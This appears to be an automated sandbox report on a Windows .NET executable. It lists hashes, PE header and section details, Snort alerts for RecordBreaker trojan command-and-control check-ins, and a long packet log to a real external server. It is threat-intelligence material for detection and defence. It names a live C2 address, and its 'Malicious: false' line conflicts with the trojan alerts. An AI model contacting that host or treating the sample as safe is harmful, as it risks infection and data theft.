SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.219776880669485
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	KbqArOlW06.exe
File size:	12978176
MD5:	005297e7c0d555822b5a6f31fcdc7661
SHA1:	9d5f9d90a1574c333ec68dbc800cb70397a1826d
SHA256:	6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
SHA512:	0b274948a9a660483d8a64170c39aeee37a8a134fc926a1adc7d9884687cfd5ef9b8c32791ad74d81454778e6ace037454b012b769eeb8367d524fc7a51b663d
SSDEEP:	98304:QxQiz9Gm4H4Ul8zl6CH1OzkcC2IBev7CEObzWxtef1lKhx0vBaU6/yYsXd3VrJSp:QQszlVVOu2I8vJObShhyvBaUeY3+
TLSH:	9ED633E12F8CCA29F3A5C639A159867982BB9E19F256780DE6F07C0D1F2579371213CC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....5.b.........."...................... .....@..... .......................@............@...@......@............... .....

File Icon


Icon Hash:	99da7233a0e2c9c9

Static PE Info

General

Entrypoint:	0x140000000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62E83593 [Mon Aug 1 20:20:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc54000	0xe9d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc51ad8	0xc51c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc54000	0xe9d0	0xea00	False	0.24090211004273504	data	3.4100373155600514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xc54518	0xe1dc	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0xc626f8	0x14	data
RT_VERSION	0xc54130	0x3e4	data
RT_MANIFEST	0xc62710	0x2bd	XML 1.0 document, ASCII text, with CRLF line terminators

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.451.195.166.17849778802036934 08/05/22-13:54:12.723337	TCP	2036934	ET TROJAN Win32/RecordBreaker CnC Checkin	49778	80	192.168.2.4	51.195.166.178
51.195.166.178192.168.2.480497782036955 08/05/22-13:54:12.825297	TCP	2036955	ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response	80	49778	51.195.166.178	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2022 13:54:12.681298971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:12.710944891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:12.712569952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:12.723336935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:12.752590895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:12.825297117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:12.825330973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:12.825359106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:12.825387001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:12.825391054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:12.825413942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:12.825423002 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:12.825448990 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.039436102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.068814039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.091945887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.091986895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092000008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092009068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092021942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092031956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092041969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092044115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.092051983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092063904 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092076063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.092103958 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.092124939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121283054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121335030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121380091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121418953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121447086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121448040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121473074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121489048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121500969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121510983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121527910 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121550083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121555090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121572971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121582031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121594906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121608019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121622086 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121634960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121645927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121661901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121670961 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121686935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121712923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121741056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121757030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121767998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121793032 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121793985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121819973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121829033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121846914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.121861935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.121895075 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151041031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151124001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151187897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151228905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151247025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151263952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151330948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151417971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151464939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151509047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151549101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151549101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151590109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151628017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151631117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151664972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151704073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151705980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151742935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151782036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151782036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151822090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151859045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151864052 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151897907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151935101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.151937008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.151973963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152012110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152015924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152050018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152072906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152089119 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152117014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152127981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152137041 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152179003 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152218103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152226925 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152257919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152260065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152303934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152307034 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152326107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152365923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152368069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152404070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152405024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152445078 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152482986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152492046 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152524948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152532101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152575970 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152578115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152601957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152621984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152642012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152651072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152681112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152683973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152715921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.152719975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152760983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152797937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.152798891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.153527975 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182156086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182193995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182214022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182238102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182260990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182285070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182295084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182311058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182333946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182334900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182346106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182356119 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182378054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182394028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182415962 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182436943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182449102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182459116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182461023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182470083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182481050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182491064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182503939 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182519913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182538033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182554960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182575941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182593107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182600021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182611942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182620049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182631969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182655096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182677984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182688951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182702065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182703972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182724953 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182725906 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182749033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182764053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182779074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182780981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182796001 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182807922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182831049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182845116 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182852983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182856083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182874918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182878971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182883024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182904005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182929039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182951927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182977915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.182981014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.182998896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183000088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183022022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183029890 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183043957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183049917 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183067083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183075905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183089972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183092117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183110952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183114052 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183131933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183136940 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183154106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183155060 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183175087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183178902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183197975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183198929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183218956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183218956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183242083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183244944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183259010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183264017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183285952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183293104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183304071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183307886 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183329105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183331966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183370113 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183377981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183398962 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183418989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183439970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183443069 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183455944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183460951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183481932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183490992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183506012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183507919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183532000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183545113 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183553934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183553934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183573961 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183576107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183592081 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183609009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183619022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183628082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183650970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183671951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183696032 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183697939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183720112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183723927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183744907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183753014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183768034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183772087 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183792114 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183792114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183815956 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183819056 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183828115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183839083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183861017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183866024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183882952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183882952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183898926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183907032 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183931112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183937073 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183954000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183970928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183974028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.183980942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.183994055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.184004068 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.184041977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:13.213246107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213294029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213320971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:13.213388920 CEST	80	49778	51.195.166.178	192.168.2.4
